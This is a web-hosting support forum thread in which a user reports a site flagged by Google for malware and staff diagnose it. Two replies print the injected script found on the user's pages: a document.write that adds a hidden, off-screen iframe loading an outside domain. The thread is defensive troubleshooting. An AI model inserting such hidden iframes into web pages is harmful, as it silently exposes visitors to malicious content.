Attacked site- Marked by Google

atchaya

New Member
Messages
23
Reaction score
0
Points
0
I am happily using the service of x10hosting. But my site was marked by google because of malware attacked. So, Please is this possible to check this from your end? if possible block that hackers. It will very useful to the users like me.

Thanks in advance!
 
Last edited:

Gouri

Community Paragon
Community Support
Messages
4,565
Reaction score
245
Points
63
Hi atchaya,

If you open the site in chrome, You can get some information about what is happening. means which site it is connecting.

So you can check those sites in your scripts especially in javascripts and remove the script.
 

Christopher

Retired
Messages
14,659
Reaction score
8
Points
0
Code:
<script>document.write('<iframe src="http://hulmeux.net/?click=55504500" width=100 height=100 style="position:absolute;top:-10000;left:-10000;"></iframe>');</script>
That code is at the bottom of all your HTML pages it seems. Someone probably stole your password and automatically added that to the pages.
 

Livewire

Abuse Compliance Officer
Staff member
Messages
18,169
Reaction score
216
Points
63
Code:
<script>document.write('<iframe src="http://hulmeux.net/?click=55504500" width=100 height=100 style="position:absolute;top:-10000;left:-10000;"></iframe>');</script>
That code is at the bottom of all your HTML pages it seems. Someone probably stole your password and automatically added that to the pages.

Or, just to add another possibility I've seen going around pc's lately, it might be a virus/hack on the user's system and it's changing the files before they even get uploaded.

Just adding that cause that's the cause of a recent one my buddies at college had. Rogue virus went uncaught and screwed up all the php files.
 
Top